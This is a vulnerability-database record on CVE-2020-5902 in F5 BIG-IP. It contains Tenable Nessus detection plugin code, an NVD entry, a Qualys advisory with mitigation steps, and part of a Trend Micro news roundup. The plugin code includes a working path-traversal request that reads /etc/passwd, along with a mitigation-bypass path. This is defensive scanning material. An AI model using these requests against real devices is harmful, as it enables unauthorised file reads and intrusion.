"metasploit"}, {"idList": ["TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88"], "type": "talosblog"}], "rev": 2}, "score": {"modified": "2020-07-09T09:32:16", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "17af6eb82a1f8738bcd0f6a0b75ddfb2e1ac4727b8d6b8eb1e47f0aa01a40be2", "hashmap": [{"hash": "5a9cdaa8e5d71cddd7f051f33c585af7", "key": "cvss3"}, {"hash": "b0d7461b77c10ac7786b50a838dc7a9c", "key": "pluginID"}, {"hash": "e0c93dcc01b783d3fa9d2e27576fe55a", "key": "published"}, {"hash": "35b1c7f6f0e357d99badbb359bd975ee", "key": "cvelist"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "2f1c9c581deb19fa328e34dcb352cf42", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "e0c93dcc01b783d3fa9d2e27576fe55a", "key": "modified"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "72209483d34c832ed8976afd75e94f48", "key": "description"}, {"hash": "c703fc707344409b82bdccfee01ee4f0", "key": "cpe"}, {"hash": "dd2d6c2d1f82de46231d07e6fb47c097", "key": "reporter"}, {"hash": "aa77a2831240884b410ad247a9550420", "key": "references"}, {"hash": "7565a9839eea867cc867ddb0c4902362", "key": "href"}, {"hash": "366dc535576f768d23d25dd106d25acd", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/138140", "id": "F5_CVE-2020-5902.NASL", "lastseen": "2020-07-09T09:32:16", "modified": "2020-07-06T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "138140", "published": "2020-07-06T00:00:00", "references": ["https://support.f5.com/csp/article/K52145254"], "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138140);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/08\");\n\n script_cve_id(\"CVE-2020-5902\");\n script_xref(name:\"IAVA\", value:\"2020-A-0283\");\n\n script_name(english:\"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"BIG-IP Traffic Management User Interface Remote Code Execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\n\nNote: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.\nThis plugin also tests for the bypass of that initial mitigation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K52145254\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a version recommended in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5902\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_analytics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_fraud_protection_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bigip_web_detect.nasl\");\n script_require_keys(\"installed_sw/F5 BIG-IP web management\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\napp = 'F5 BIG-IP web management';\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);\ninstall = get_single_install(app_name:app, port:port);\npasswd_pattern = \"root:.*:0:[01]:\";\npoc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';\nbypass_path = '/hsqldb;';\n\nfile = \"/etc/passwd\";\ngeneric = FALSE;\nline_limit = 10;\n\nurl = build_url(qs:\"/\", port:port);\n\nres = http_send_recv3(\n method : 'GET',\n port : port,\n item : poc_path,\n exit_on_fail : TRUE\n);\n\nif (!egrep(pattern:passwd_pattern, string:res[2]))\n{\n\n res = http_send_recv3(\n method : 'GET',\n port : port,\n item : bypass_path,\n exit_on_fail : TRUE\n );\n\n if('HSQL Database Engine Servlet'>< res[2])\n {\n output = chomp(res[2]);\n file = NULL;\n generic = TRUE;\n line_limit = 3;\n }\n else\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n}\nelse{\n output = str_replace(string:res[2], find:'\\\\n', replace:'\\n');\n}\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n request : make_list(http_last_sent_request()),\n file : file,\n generic : generic,\n output : output,\n line_limit : line_limit,\n attach_type : 'text/plain'\n);\n", "title": "F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)", "type": "nessus", "viewCount": 11}, "differentElements": ["sourceData"], "edition": 3, "lastseen": "2020-07-09T09:32:16"}], "edition": 5, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "c703fc707344409b82bdccfee01ee4f0"}, {"key": "cvelist", "hash": "35b1c7f6f0e357d99badbb359bd975ee"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "cvss3", "hash": "5a9cdaa8e5d71cddd7f051f33c585af7"}, {"key": "description", "hash": "72209483d34c832ed8976afd75e94f48"}, {"key": "href", "hash": "7565a9839eea867cc867ddb0c4902362"}, {"key": "modified", "hash": "e0c93dcc01b783d3fa9d2e27576fe55a"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "b0d7461b77c10ac7786b50a838dc7a9c"}, {"key": "published", "hash": "e0c93dcc01b783d3fa9d2e27576fe55a"}, {"key": "references", "hash": "aa77a2831240884b410ad247a9550420"}, {"key": "reporter", "hash": "dd2d6c2d1f82de46231d07e6fb47c097"}, {"key": "sourceData", "hash": "9e0671ea4e1a52daa18d27aa238227b1"}, {"key": "title", "hash": "2f1c9c581deb19fa328e34dcb352cf42"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "850aedec4fc464f29d45cb39f6a3a6dd81a21bb076b4abbd1d19684da634d61a", "viewCount": 40, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-5902"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B"]}, {"type": "talosblog", "idList": ["TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88"]}, {"type": "dsquare", "idList": ["E-709"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:158581", "PACKETSTORM:158366", "PACKETSTORM:158333"]}, {"type": "exploitdb", "idList": ["EDB-ID:48642", "EDB-ID:48643", "EDB-ID:48711"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/F5_BIGIP_TMUI_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-34647", "1337DAY-ID-34748", "1337DAY-ID-34652", "1337DAY-ID-34646"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL52145254.NASL"]}, {"type": "thn", "idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108"]}, {"type": "threatpost", "idList": ["THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3"]}, {"type": "cert", "idList": ["VU:290915"]}], "modified": "2020-08-05T09:28:24", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2020-08-05T09:28:24", "rev": 2}, "vulnersScore": 7.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138140);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/03\");\n\n script_cve_id(\"CVE-2020-5902\");\n script_xref(name:\"IAVA\", value:\"2020-A-0283\");\n\n script_name(english:\"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"BIG-IP Traffic Management User Interface Remote Code Execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the\nConfiguration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute\narbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\n\nNote: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.\nThis plugin also tests for the bypass of that initial mitigation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K52145254\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a version recommended in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-5902\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_analytics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_domain_name_system\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_fraud_protection_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bigip_web_detect.nasl\");\n script_require_keys(\"installed_sw/F5 BIG-IP web management\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\napp = 'F5 BIG-IP web management';\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);\ninstall = get_single_install(app_name:app, port:port);\npasswd_pattern = \"root:.*:0:[01]:\";\npoc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';\nbypass_path = '/hsqldb;';\n\nfile = \"/etc/passwd\";\ngeneric = FALSE;\nline_limit = 10;\n\nurl = build_url(qs:\"/\", port:port);\n\nres = http_send_recv3(\n method : 'GET',\n port : port,\n item : poc_path,\n exit_on_fail : TRUE\n);\n\nif (!egrep(pattern:passwd_pattern, string:res[2]))\n{\n\n res = http_send_recv3(\n method : 'GET',\n port : port,\n item : bypass_path,\n exit_on_fail : TRUE\n );\n\n if('HSQL Database Engine Servlet'>< res[2])\n {\n output = chomp(res[2]);\n file = NULL;\n generic = TRUE;\n line_limit = 3;\n }\n else\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);\n}\nelse{\n output = str_replace(string:res[2], find:'\\\\n', replace:'\\n');\n}\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n request : make_list(http_last_sent_request()),\n file : file,\n generic : generic,\n output : output,\n line_limit : line_limit,\n attach_type : 'text/plain'\n);\n", "naslFamily": "CGI abuses", "pluginID": "138140", "cpe": ["cpe:/a:f5:big-ip_domain_name_system", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_analytics", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_fraud_protection_service", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_access_policy_manager"], "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "scheme": null}

{"cve": [{"lastseen": "2020-08-08T11:55:23", "bulletinFamily": "NVD", "description": "In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.", "modified": "2020-08-07T12:15:00", "id": "CVE-2020-5902", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5902", "published": "2020-07-01T15:15:00", "title": "CVE-2020-5902", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-08-07T08:03:43", "bulletinFamily": "blog", "description": "**Update July 10, 2020**: F5 updated their mitigation section of [security advisory](<https://support.f5.com/csp/article/K52145254>) on July 8, 2020 at 17:00 Pacific time, and provided a new mitigation mechanism to help customers mitigate currently known unauthenticated exploits. \nQualys also updated QID 38791 to reflect these changes and are available in VULNSIGS version 2.4.935-3 and above.\n\n**Update July 8, 2020**: F5 updated the [security advisory](<https://support.f5.com/csp/article/K52145254>) again on July 8, 2020, at 09:30 PT, saying that &quot;all previously provided mitigations are not completely effective&quot; and recommends &quot;installing patched versions of the software to address the underlying vulnerability.&quot; Customers are strongly urged to install the patched version as soon as possible.\n\nF5 Networks recently released updates for the critical RCE vulnerability (CVE-2020-5902) that affects its BIG-IP products. The vulnerability that has been actively exploited in the wild allows attackers to read files, execute code or take complete control over vulnerable systems having network access. The security issue has received a critical severity rating score of 9.8 based on CVSS v3.1 Scoring system. \n\n**Vulnerability Details:**\n\n[Mikhail Klyuchnikov](<https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/>), the security researcher from Positive Technologies who discovered the vulnerability, says, \u201cBy exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution (RCE1). The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network. RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation. This is particularly dangerous for companies whose F5 BIG-IP web interface is listed on search engines such as Shodan. Fortunately, most companies using the product do not enable access to the interface from the internet.\u201d\n\nThis vulnerability is observed in the wild to be actively exploited and causing credentials to be stolen.\n\nUS-Cyber Command tweeted to immediately patch your system:\n\n[](<https://threatprotect.qualys.com/wp-content/uploads/2020/07/f5-3.png>)\n\n##### **Exploitation****:**\n\nOn Shodan, we observed more than 1000 publicly-available devices on the internet that may be vulnerable.\n\n[](<https://threatprotect.qualys.com/wp-content/uploads/2020/07/3-1.jpg>)\n\n_Image Source: Shodan_\n\nMetasploit has released a public [exploit](<https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb>) module for CVE-2020-5902. Demonstration of the Metasploit POC is available on [GitHub](<https://github.com/jas502n/CVE-2020-5902>).\n\n[](<https://threatprotect.qualys.com/wp-content/uploads/2020/07/big-ip-1.jpg>)\n\n_Image Source: Qualys Lab_\n\n##### **Affected products:**\n\nBIG-IP versions 11.6.x, 12.1.x, 13.1.x, 15.0.x and 15.1.x\n\n## Using VMDR, Identify the Presence of CVE-2020-5902 and Management Interface on F5 Big-IP Remotely\n\nQualys has issued the information gathered (IG) QID 42400 to help customers track devices where the Management Interface is accessible on F5 BIG-IP. This QID can be detected via a remote unauthenticated scan.\n\n_QID 42400: Management Interface Accessible On F5 BIG-IP_\n\nTo identify the presence of CVE-2020-5902 remotely, Qualys has issued QID 38791: \n\n_QID 38791: F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)_\n\nAlong with the remote QID 38791, Qualys also released authenticated vulnerability QIDs (373106, 373107) which cover multiple CVEs (CVE-2020-5902, CVE-2020-5903). These QIDs are included in signature version VULNSIGS-2.4.930-5 and above.\n\nPlease Note: As F5 updated their advisory on July 8, with updated mitigation steps, Qualys QID 38791 is also updated to reflect those changes and is available in VULNSIGS-2.4.935-3 and above\n\n\n\nUsing VMDR, QID 38791 can be prioritized for the following RTIs:\n\n * Remote Code Execution\n * Unauthenticated Exploitation\n * Public Exploit\n * Active Attacks\n * Easy Exploit\n * High Data Loss\n\n\nWith VMDR Dashboard, you can track F5 Big-IP vulnerabilities, impacted hosts, their status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of CVE-2020-5902 vulnerability trends in your environment using [F5 BIG-IP Dashboard](<https://qualys-secure.force.com/discussions/s/article/000006364>):\n\n\n\n### Qualys Threat Protection\n\nQualys customers can stay on top of these threats proactively via the Live Feed provided for threat prioritization. With Live Feed updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets number to see a list of hosts with this vulnerability.\n\n#### Configuration management adds context to overall vulnerability management\n\nTo overall reduce the security risk, it is important to take care of F5 Big-IP misconfigurations as well. Qualys VMDR shows your F5 Big-IP misconfiguration posture in context with your vulnerability posture, allowing you to see which hosts have CVE-2020-5902 vulnerability.\n\nWith [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can check for misconfigurations in context to CVE-2020-5902 vulnerability.\n\n * Qualys configuration ID \u2013 18836 \u201cStatus of &#x27;LocationMatch&#x27; derivative included for httpd component using sys module\u2019 file\u201d would be evaluated against all interfaces to check for unauthenticated attackers in the result section as shown below \u2013\n\n\n * Qualys configuration ID \u2013 18835 \u201cList of allow-service configured for all Self IP Addresses\u201d would be evaluated against all self IPs that addresses unauthenticated and authenticated attackers on self-IPs, by blocking all access, as shown in the result section below \u2013\n\n\n * Qualys configuration ID \u2013 13903 \u201cStatus of current list of allowed IP addresses for httpd daemon\u201d would be evaluated against all Management interface that addresses unauthenticated attackers on management interface, by restricting access, as shown in the result section below \u2013\n\n\n## Risk-Based Prioritization of F5 BIG-IP Vulnerability\n\n \nNow that you have identified the hosts, F5 Big-IP versions and context of detected vulnerabilities and misconfigurations, you may want to prioritize your remediation based on the risk, as each vulnerable asset might not pose the same risk.\n\n#### High Risk:\n\nHosts for which QIDs 38791, 373106 or 373107 are detected for CVE-2020-5902 and misconfigurations CIDs 18836, 18835 and 13903 controls are failing as shown below-\n\n  \n\n#### Medium Risk:\n\nHosts with CVE-2020-5902 is detected, however, the configurations for running instances are detected as hardened.\n\n  \n\n#### **Workaround**\n\nAdministrators are advised to use ACL or Disable the TMUI to minimize the potential of inbound threats. F5 Networks has also provided a workaround as follows:\n\n**_All network interfaces:_**\n\n 1. Log in to the TMOS Shell (**tmsh**) by entering the following command: \ntmsh\n 2. Edit the **httpd** properties by entering the following command: \nedit /sys httpd all-properties\n * Locate the **include **section and add the following: \ninclude \u2018 \n_&lt;LocationMatch &quot;;&quot;>_\n * _Redirect 404 /_\n * _&lt;/LocationMatch>_\n * _&lt;LocationMatch &quot;hsqldb&quot;>_\n * _Redirect 404 /_\n * _&lt;/LocationMatch>_&#x27;\n 3. Write and save the changes to the configuration file by entering the following commands: \nEsc \n:wq!\n 4. Save the configuration by entering the following command: \nsave /sys config\n 5. Restart the **httpd **service by entering the following command: \nrestart sys service httpd \nAlternatively, users can follow the steps below to mitigate this vulnerability.\n * **Self IPs:** To block all access to the TMUI of your BIG-IP system via Self IPs, you can change the Port Lockdown setting to Allow None for each Self IP in the system. If you must open any ports, you should use Allow Custom, taking care to disallow access to TMUI.\n * **Management interface: **To mitigate this vulnerability for affected F5 products, you should only permit management access to F5 products over a secure network.\n\nCustomers are encouraged to scan their network with QIDs# 38791, 373106, 373107 to identify the presence of RCE vulnerability (CVE-2020-5902) and apply [F5 patches](<https://support.f5.com/csp/article/K52145254>) as soon as possible.\n\n#### **References &amp; Sources:**\n\n * <https://medium.com/@un4gi/from-directory-traversal-to-rce-an-inside-look-at-cve-2020-5902-17bf483e4a9d>\n * <https://github.com/yassineaboukir/CVE-2020-5902>\n * <https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb>\n * <https://github.com/jas502n/CVE-2020-5902>\n * <https://support.f5.com/csp/article/K52145254>", "modified": "2020-07-06T23:09:52", "published": "2020-07-06T23:09:52", "id": "QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "F5 BIG-IP Remote Code Execution Vulnerability (CVE-2020-5902)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2020-08-07T08:03:49", "bulletinFamily": "blog", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about how Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion. Also, learn about how the Vermont Department of Taxes may have been exposing taxpayer data for more than three years.\n\nRead on:\n\n[**Ransomware is Still a Blight on Business**](<https://blog.trendmicro.com/ransomware-is-still-a-blight-on-business/>)\n\n_Ransomware has been with us for years, but only really became mainstream after the global WannaCry and NotPetya incidents of 2017. Now mainly targeting organizations in lieu of consumers, and with increasingly sophisticated tools and tactics, the cybercriminals behind these campaigns have been turning up the heat during the COVID-19 pandemic. That\u2019s why we need industry partnerships like No More Ransom._\n\n[**Garmin Outage Caused by Confirmed WastedLocker Ransomware Attack**](<https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/>)\n\n_Wearable device maker Garmin shut down some of its connected services and call centers last week following what the company called a worldwide outage, now confirmed to be caused by a WastedLocker ransomware attack._ _Garmin&#x27;s product line includes GPS navigation and wearable technology for the automotive, marine, aviation, marine, fitness, and outdoor markets._\n\n[**Trend Micro Launches Cloud Solution for Microsoft Azure**](<https://datacenternews.us/story/trend-micro-launches-cloud-solution-for-microsoft-azure>)\n\n_Trend Micro announced the availability of its Trend Micro Cloud One \u2013 Conformity offering to Azure customers, helping global organizations tackle misconfigurations, compliance challenges and cyber-risks in the cloud. The company also achieved the CIS Microsoft Azure Foundation Security Benchmark, certifying that the Conformity product has built-in rules to check for more than 100 best practices in the CIS framework._\n\n[**Ensiko: A Webshell with Ransomware Capabilities**](<https://blog.trendmicro.com/trendlabs-security-intelligence/ensiko-a-webshell-with-ransomware-capabilities/>)\n\n_Ensiko is a PHP web shell with ransomware capabilities that targets platforms such as Linux, Windows, macOS, or any other platform that has PHP installed. The malware has the capability to remotely control the system and accept commands to perform malicious activities on the infected machine. It can also execute shell commands on an infected system and send the results back to the attacker via a PHP reverse shell._\n\n[**\u2018Boothole\u2019 Threatens Billions of Linux, Windows Devices**](<https://www.scmagazine.com/home/security-news/boothole-threatens-billions-of-linux-windows-devices/>)\n\n_A newly discovered serious vulnerability \u2013 dubbed \u201cBootHole\u201d \u2013 with a CVSS rating of 8.2 could unleash attacks that could gain total control of billions of Linux and Windows devices. Security firm Eclypsium researchers released details this week about how the flaw can take over nearly any device\u2019s boot process._\n\n[**Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902**](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/>)\n\n_Following the initial disclosure of two F5 BIG-IP vulnerabilities in early July, Trend Micro continued monitoring and analyzing the vulnerabilities and other related activities to further understand their severities. Based on the workaround published for CVE-2020-5902, Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload._\n\n[**Hackers Stole GitHub and GitLab OAuth Tokens from Git Analytics Firm Waydev**](<https://www.zdnet.com/article/hackers-stole-github-and-gitlab-oauth-tokens-from-git-analytics-firm-waydev/#ftag=RSSbaffb68>)\n\n_Waydev, a San Francisco-based company, runs a platform that can be used to track software engineers&#x27; work output by analyzing Git-based codebases. Earlier this month, the company disclosed a security breach, saying that hackers broke into its platform and stole GitHub and GitLab OAuth tokens from its internal database._\n\n[**Application Security 101**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/application-security-101>)\n\n_As the world currently grapples with the disruption brought about by the coronavirus pandemic, the need for digital transformation has become not only more apparent but also more urgent. Applications now play an integral role, with many businesses and users relying on a wide range of applications for work, education, entertainment, retail, and other uses._\n\n[**Vermont Taxpayers Warned of Data Leak Over the Past Three Years**](<https://threatpost.com/vermont-taxpayers-warned-of-data-leak-over-the-past-three-years/157856/>)\n\n_The Vermont Department of Taxes may have been exposing taxpayer data that could be used in credential scams for more than three years due to a vulnerability in its online tax filing system. A notice posted on the department\u2019s website warned taxpayers who filed a Property Transfer Tax return through the department\u2019s online filing site between Feb. 1, 2017, and July 2, 2020, may have had their personal information leaked._\n\n[**Guidelines Related to Security in Smart Factories Part 6: MITRE ATT&amp;CK**](<https://www.trendmicro.com/us/iot-security/news/6036/Guidelines_Related_to_Security_in_Smart_Factories_Part_6_MITRE_ATT_CK>)\n\n_This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Thus far, part one through part five have explained IEC62443, the NIST CSF, part of the P800 series, and CIS Controls. In part six, Trend Micro explains MITRE ATT&amp;CK, although not a guideline, it is a knowledge base in which offensive and defensive technologies in cyber-attacks are clearly organized._\n\n[**If You Own One of These 45 Netgear Devices, Replace 